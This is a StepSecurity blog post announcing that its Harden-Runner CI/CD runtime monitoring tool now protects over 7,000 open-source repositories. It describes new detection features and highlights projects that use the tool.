Back to Blog

7,000 Open-Source Projects Now Secured by Harden-Runner

StepSecurity’s Harden-Runner now protects over 7,000 GitHub repositories with real-time CI/CD runtime monitoring, threat detection, and supply chain security enforcement—backed by features like impostor commit alerts, process-based detections, and GitLab support.
Eromosele Akhigbe
View LinkedIn

June 30, 2025

Share on X
Share on X
Share on LinkedIn
Share on Facebook
Follow our RSS feed
Table of Contents

At StepSecurity, our mission is unwavering: make CI/CD pipelines secure by default. Today, we’re excited to announce that Harden-Runner is now protecting over 7,000 open-source repositories—just barely two months after hitting the 6000th mark.

We’re now monitoring over 5 million jobs per week across workflows from community users and our enterprise customers. This reflects a growing understanding across the developer and security communities that CI/CD is the new frontier for supply chain security, and visibility into what runs during builds is no longer optional.

Why It Matters: Harden-Runner in a Threat-Filled Landscape

The software supply chain is under siege—from mutable tags and unmaintained Actions to sophisticated exfiltration techniques embedded in trusted projects. Developers need tools that provide real-time protection without breaking workflows or slowing teams down.

Harden-Runner does exactly that. It offers runtime monitoring and enforcement for GitHub Actions, detecting suspicious behavior as it happens—often before anyone else is aware.

CI/CD Security in the Wild: Harden-Runner Detects and Defends

Our growth in open-source adoption hasn’t happened in a vacuum. It’s happened because Harden-Runner consistently delivers real-world value, often catching threats others miss.

One such example is our early detection of the tj-actions supply chain breach, which exposed a chained compromise across popular GitHub Actions. This critical discovery only prevented potential damage for many projects.

Varun Sharma (CEO, StepSecurity) and Ashish Kurmi (CTO, StepSecurity) will be presenting the full story at Black Hat USA in their talk, “When ‘Changed Files’ Changed Everything: Uncovering and Responding to the tj-actions Supply Chain Breach.” If you’re attending, we’d love for you to stop by and chat.

Picture 913472916, Picture

Harden-Runner Detects New Traffic to release-assets.githubusercontent.com Across Multiple Customers

Harden-Runner detected unexpected outbound calls to release-assets.githubusercontent.com across multiple customers. This new domain had never appeared in workflow baselines and raised concerns of a potential platform compromise.

StepSecurity quickly correlated the activity, engaged GitHub Support, and confirmed it was a legitimate infrastructure change—not a breach. Harden-Runner baselines were immediately updated, and customers were advised to update egress rules.

What’s New: Expanded Capabilities Since 6,000 Projects

Since our last milestone blog at 6,000 projects, we've introduced several features to help teams get more from Harden-Runner:

Impostor Commit detection

We now alert you when a GitHub Action uses a tag that points to a commit that doesn’t exist in the action repo’s default branch. This helps you:

  • Spot potentially compromised actions
  • Audit projects with risky release practices
  • Make informed decisions about trusting such actions

👉 Learn more in this blog post

Baseline Monitoring

We introduced baseline monitoring to detect unusual outbound network activity across jobs, repositories, ARC clusters, and even GitHub organizations. Each resource is assigned a Creating, Stable, or Unstable status to help teams identify anomalies faster.

👉 Learn more in the docs

Process Based Detections

We’ve recently expanded our detection capabilities to include process-based signals. These detections help identify high-risk behaviors on the runner, such as:

  • Attempts to read runner worker memory
  • Execution of reverse shells
  • Launching of privileged containers

These additions enhance our ability to detect and block sophisticated attacks that go beyond network-based indicators.

GitLab Support  

StepSecurity now supports GitLab self-hosted runners, giving GitLab users access to the same rich telemetry and policy enforcement that GitHub projects enjoy.

👉 Learn more in the docs

StepSecurity on AWS Marketplace

StepSecurity is now available on AWS Marketplace, making it easier for enterprises to procure and deploy CI/CD protections at scale.

👉Learn more in this blog post

Project Spotlight: Harden-Runner in Action

We’re proud to support the open-source ecosystem through our Community Tier—free for all public repositories.

Thousands of projects rely on Harden-Runner for threat detection, least privilege enforcement, and runtime visibility. Here are a few recent standouts:

WasmEdge : A high-performance WebAssembly runtime, WasmEdge uses Harden-Runner to secure its CI workflows with outbound network controls and behavioral monitoring.

Explore this interactive demo to see how WasmEdge leverages Harden-Runner to secure its GitHub workflow files:

Intel’s Open-source: Several of Intel’s open-source projects are now protected, including:

These repos form the building blocks for developer tooling and UI design, and Harden-Runner helps ensure their workflows stay locked down and observable.

Explore this interactive demo to see how Intel leverages Harden-Runner to secure its GitHub workflow files:

🔒 Not Using Harden-Runner Yet?

Now’s the perfect time to get started with Harden-Runner, use  Secure Workflow—free on our Community Tier to automatically add Harden-Runner to your workflow file. Protect your GitHub Actions in just a few clicks.

Let’s push CI/CD security forward—together.

Blog

Explore Related Posts